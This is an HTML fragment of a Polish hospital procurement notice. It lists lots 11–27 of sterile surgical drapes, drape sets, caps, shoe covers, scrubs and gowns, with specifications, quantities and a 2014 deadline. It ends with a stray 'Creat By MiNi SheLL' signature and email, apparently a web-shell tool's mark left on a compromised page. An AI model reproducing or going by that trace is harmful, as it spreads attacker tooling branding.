<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna folia chirurgiczna do zabezpieczania pola operacyjnego, wysoka przepuszczalność pary wodnej gwarantuje bardzo dobre przyleganie nawet podczas długich zabiegów, antystatyczna, niepalna, nie powodująca refleksów. Łatwa w aplikacji dzięki fingerliftom odrywanym po przyklejeniu 40x41 cm, powierzchnia lepną 40x35 cm, wykonana z cienkiej poliuretanowej folii o grubości 23-25 mikronów i współczynniku przepuszczalności >700 MVTR
szt.200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw serwet uniwersalnych w składzie:
- 1 szt serweta 175x175cm, wyposażona w taśmę lepną, wzmocniona w strefie krytycznej wysokochłonną warstwą o gramaturze min. 50 g/m2
- 1 szt. serweta 240x150cm, wyposażona w taśmę lepną, wzmocniona w strefie krytycznej wysokochłonną warstwą o gramaturze min. 50 g/m2
- 1 szt. serwety stanowiącej owinięcie zestawu 150x190 cm, warstwa chłonna w rozmiarze 75x190 cm
- 1 szt. taśmy lepnej 9x49c
- 1 szt. osłony na stolik 79x145cm, warstwa chłonna 65x85cm
- 4 szt. celulozowych ręczników chłonnych 18x25cm
- 2 szt. serwety 90x75cm z tasmą lepną, wzmocniona w strefie krytycznej wysokochłonną warstwą, o gramaturze min. 50 g/m2
Zestaw musi spełniać wymagania wysokie wg normy PN EN 13795 1-3, przy czym nieprzemakalność serwet podstawowych w strefie krytycznej na poziomie min. 870 cm H2O przy jednoczesnej wytrzymałości na wypychanie/rozrywanie w strefie krytycznej na poziomie min. 165 kPa
Materiał podstawowy obłożenia składający się z min. 4 warstw: warstwy chłonnej o gramaturze min. 23 g/m2, folii PE 40-45 mikronów, oraz warstwy papierowej min. 20 g/m2
Dopuszcza się tolerancję rozmiarów+ 5%
szt. 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do laparoskopii: serweta chirurgiczna do laparoskopii o wymiarach 180x320 cm z samoprzylepnym otworem
w kształcie trapezu (wysokość 20 cm, dolna podstawa 30 cm, górna podstawa 20 cm) - 1 szt., taśma samoprzylepna 9x49 cm - 1szt., ręczniki chłonne 30x40 cm- 2 szt., kieszeń dwukomorowa samoprzylepna ze sztywnikiem 2x15x40 cm- 1 szt., osłona na stolik MAYO 79x145 cm- 1 szt., serweta na stolik - (owinięcie zestawu) 150x200 cm- 1 szt.
Zestaw musi spełniać wymagania normy PN En 13795, serweta główna wykonana z chłonnego lamiantu min. dwuwarstwowego na całej powierzchni serwety o gramaturze min. 60 g/m2
Dopuszcza się toleracncję rozmiarów serwet + 5%, tolerancja rozmiaru w przypadku otworów + 2 cm, tolerancja w przypadku pozostałych elemntów zestawu + 3 cm
szt. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do artroskopii/ACL z torbą: Zestaw do artroskopii kolana w składzie:
- serweta chirurgiczna do zabiegu w okolicach stawu kolanowego o wymiarach 230x320 cm, posiadający samouszczelniający otwór z neoprenu o średnicy 7 cm, z możliwością zamocowania drenów. Serweta jest wyposażona w torbę do przechwytywania płynów z możliwością podłączenia drenu - 1 szt.
-serweta dodatkowa na stolik  w rozmiarze 150 x 190 cm - 1 szt.
-osłona na kończynę 22 x 75 cm - 1 szt.
-taśmy samoprzylepne - min. 2 szt.
-ręczniki chłonne - min. 4 szt.
-osłona na stolik MAYO 79x145cm, warstwa chłonna 65x85cm - 1  szt.
-osłona na stolik - (owinięcie zestawu) 150 x 190 cm
Tolerancja rozmiarów serwet głównych + 10 cm, tolerancja rozmiaru otworu + 1 cm, tolerancja rozmiarów pozostałych elementów + 3 - 5 cm
Zestaw musi spełniać wymagania wysokie wg normy PN EN 13795 1-3 przy czym wytrzymałość na wypychanie/rozrywanie w strefie krytycznej na poziomie min. 65 kPa Materiał podstawowy serwety głównej składający się min. z  2 warstw ( folia PE oraz warstwa chłonna ) o łącznej gramaturze min. 60 g/m2
szt. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do operacji stawu biodrowego: serweta chirurgiczna górna z taśmą samoprzylepną o wymiarach 300x175 cm, wzmocniona w strefie krytycznej (dodatkowa warstwa chłonna) i wyposażona w organizatory przewodów - 1 szt., serweta chirurgiczna dolna o wymiarach 200x260 cm z wycięciem U o wymiarach 7x102 cm, wzmocniona (dodatkowa warstwa chłonna) w strefie krytycznej- 1 szt., serweta chirurgiczna 75x90 cm- 1 szt., serweta na stolik 150x190 cm- 1 szt., osłona na kończynę  32x120 cm- 1 szt., taśmy samoprzylepne 9x49 cm- 2 szt., ręczniki chłonne 18x25 cm- 4 szt., wzmocniona osłona na stolik Mayo 79x145 cm- 1 szt., wzmocniona serweta na stolik - (owinięcie zestawu) 150x190 cm- 1 szt.
Zestaw musi spełniać wymagania wysokie normy PN EN 13795, serweta główna na pacjenta wykonana z laminatu min. 3 warstwowego ( warstwa chłonna zabezpieczająca pacjenta od strony wewnętrznej serwety ) przy czym w strefie krytycznej - dodatkowa 4 warstwa chłonna o gramaturze min. 50 g/m2. Nieprzemakalność serwety głównej na poziomie min. 840 cm H2O w strefie krytycznej, strefa mniej krytyczna min. 800 cm H2O
Dopuszcza się tolerancję rozmiarów serwet + 5%, tolerancja rozmiaru w przypadku wycięcia U + 2 cm, tolerancja w przypadku pozostałych elementów zestawu + 3 cm
szt. 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do zabiegów neurochirurgicznych: serweta chirurgiczna do zabiegów w okolicy głowy o wymiarach 240x180 cm posiadająca otwór wypełniony folią chirurgiczną o wymiarach 25x20 cm, wyposażona w dodatkową warstwę chłonna wokół otworu o wymiarach 50x60 cm z dwoma zakładkami oraz zintegrowany worek foliowy do przechwytywania płynów- 1 szt., serweta chirurgiczna z taśmą samoprzylepną do zabezpieczenia headrestu 45x60 cm- 2 szt., taśmy samoprzylepne 9x49 cm- 2 szt., ręczniki chłonne 30x40 cm- 2 szt., kieszeń dwukomorowa samoprzylepna ze sztywnikiem 2x15x30 cm- 1 szt., kieszeń jednokomorowa samoprzylepna ze sztywnikiem 30x30 cm- 1 szt., osłona na stolik MAYO 79x145 cm- 1 szt., serweta na stolik - (owinięcie zestawu) 150x200 cm- 1 szt. Zestaw musi spełniac wymagania wysokie wg normy PN EN 13795 1-3 przy czym nieprzemakalność serwety głównej strefie krytycznej na poziomie min. 340 cm H2O przy jednoczesnej wytrzymałości na wypychanie/rozrywanie w strefie krytycznej na poziomie min. 150 kPaSerweta główna wykonanz laminatu min. dwuwarstwowego o gramaturze min 62 g/m2 w strefie mniej krytycznej, wzmocnionego w strefie krytycznej laminatem min. dwuwarstwowym, wiskozowym o gramaturze min. 83 g/m2 Dopuszcza się toleracncję rozmiarów serwet + 5%, tolerancja rozmiaru w przypadku otworów + 2 cm, tolerancja w przypadku pozostałych elemntów zestawu + 3 cm
szt. 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do laparoskopii: serweta chirurgiczna do laparoskopii o wymiarach 180x320 cm z samoprzylepnym otworem
w kształcie trapezu (wysokość 20 cm, dolna podstawa 30 cm, górna podstawa 20 cm) - 1 szt., serweta na stolik - (owinięcie zestawu) 150x180 cm.
Serweta wykonana z laminatu nieprzemakalnego o gramaturze min. 60 g/m2
Dopuszcza się toleracncję rozmiarów serwet + 5%, tolerancja rozmiaru w przypadku otworów + 2 cm, tolerancja w przypadku pozostałych elemntów zestawu + 3 cm
szt. 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czepek chirurgiczny o kroju furażerki, w części bocznej wykonany z włókniny pochłaniającej pot a w części górnej z włókniny perforowanej, wiązany na troki, gramatura włókniny nie mniej niż 26 g/m2 Pakowany w kartonik w formie podajnika.
szt. 1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Włókninowy czepek chirurgiczny w kształcie beretu, ze wstawką
pochłaniającą pot (wstawka wykonana jest z białej włókniny, trój-warstwowej materiał złączony metodą ultradźwiękową, dwie zewnętrzne warstwy oraz warstwa wewnętrzna składają się ze zlakowanej włókniny  ) ściągnięty delikatną, nie uciskającą, bezlateksową gumką. Pakowany w kartonik w formie podajnika
szt. 1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czepek chirurgiczny wykonany z chłonnej włókniny wiskozowej, wydłużony z możliwością wywinięcia. Elastyczna struktura czepka pozwala na dopasowanie się do głowy. Pakowany w kartonik w formie podajnika.
szt. 1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pokrowce higieniczne na buty, wykonane z wytrzymałej folii PE, wyposażone w molet antypoślizgowy, nietoksyczne, niepylące, do zastosowania w środowisku czystych pomieszczeń
szt. 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uniwersalny fartuch wykonany z cienkiej i mocnej białej folii. Przeznaczony do chirurgicznego mycia rąk. Folia min. 18 mikronów
szt. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubranie chirurgiczne - spodnie - używane przez personel jest przeznaczona do tego, aby chronić pacjenta przed florą bakteryjną personelu poprzez zapewnienie bariery - z dużą, zaprojektowaną ergonomicznie kieszenią, wykonana z włókniny typu Spunbonded bawełnopodobnej o gramturze minimalnej 50g/m2, zawiera 100% oddychającej, przenzaczonej do stosowania przez personel medyczny w środowisku bloku operacyjnego. Spodnie ściągane tasiemką, kieszeń boczna na nogawicy z klapką wyposażoną w nap. Kolor niebieski lub zielony, rozmiar S, M, L
szt.250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubranie chirurgiczne - spodnie - używane przez personel jest przeznaczona do tego, aby chronić pacjenta przed florą bakteryjną personelu poprzez zapewnienie bariery - z dużą, zaprojektowaną ergonomicznie kieszenią, wykonana z włókniny typu Spunbonded bawełnopodobnej o gramturze minimalnej 50g/m2, zawiera 100% oddychającej, przenzaczonej do stosowania przez personel medyczny w środowisku bloku operacyjnego. Spodnie ściągane tasiemką, kieszeń boczna na nogawicy z klapką wyposażoną w nap. Kolor niebieski lub zielony, rozmiar  XL, XXL
szt. 250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubranie chirurgiczne - bluza uzywana przez personel jest przeznaczona do tego, aby uchronić pacjenta przed flora bakreryjną personelu poprzez zapewnienie bariery; z dużymi, zaprojektowanymi ergonomicznie kieszeniami; wykonana z włokniny typu Spunbonded bawełnopodobnej o gramaturze minimalnej 50g/m2, zawiera 100% polipropylenu; wykonana z włókniny antystatycznej, niepylącej, oddychającej, przeznaczonej dos tosowania przez personel medyczny w środowisku bloku operacyjnego. Bluza krótki rękaw, pod szyją wyposażona w nap, kieszeń na piersi, dwie kieszenie boczne na dole bluzy. Kolor niebieski lub zielony, w rozmiarach  S, M,L 
szt. 250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubranie chirurgiczne - bluza uzywana przez personel jest przeznaczona do tego, aby uchronić pacjenta przed flora bakreryjną personelu poprzez zapewnienie bariery; z dużymi, zaprojektowanymi ergonomicznie kieszeniami; wykonana z włokniny typu Spunbonded bawełnopodobnej o gramaturze minimalnej 50g/m2, zawiera 100% polipropylenu; wykonana z włókniny antystatycznej, niepylącej, oddychającej, przeznaczonej dos tosowania przez personel medyczny w środowisku bloku operacyjnego. Bluza krótki rękaw, pod szyją wyposażona w nap, kieszeń na piersi, dwie kieszenie boczne na dole bluzy. Kolor niebieski lub zielony, w rozmiarach  XL, XXL
szt. 250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> 27.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny fartuch chirurgiczny do procedur standardowych, wykonany z lekkiej i przewiewnej włókniny typu SMS/SMMS o gramaturze min. 35g/m2; wyposażony w nieprzemakalne wstawki z przodu i na rękawach (rękaw na wysokości wstawki zszyte techniką ultradźwiękową, zapewniające pełną barierowość); fartuch złożony w sposób zapewniający aseptyczną aplikację, wiązany na troki wewnętrzne oraz troki zewnętrzne z kartonikiem, z tyłu zapięcie na rzep. Indywidulane oznakowanie rozmiaru i rodzaju nadrukowane na fartuchu, pozwalające na identyfikację przed rozłożeniem. Opakowanie folia - papier z min. 2 etykietami przylepnymi, min. 1 ręczniczek. Zgodny z normą PN EN 13795 - wymagania standardowe. Rozmiar L, XL
szt. 250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com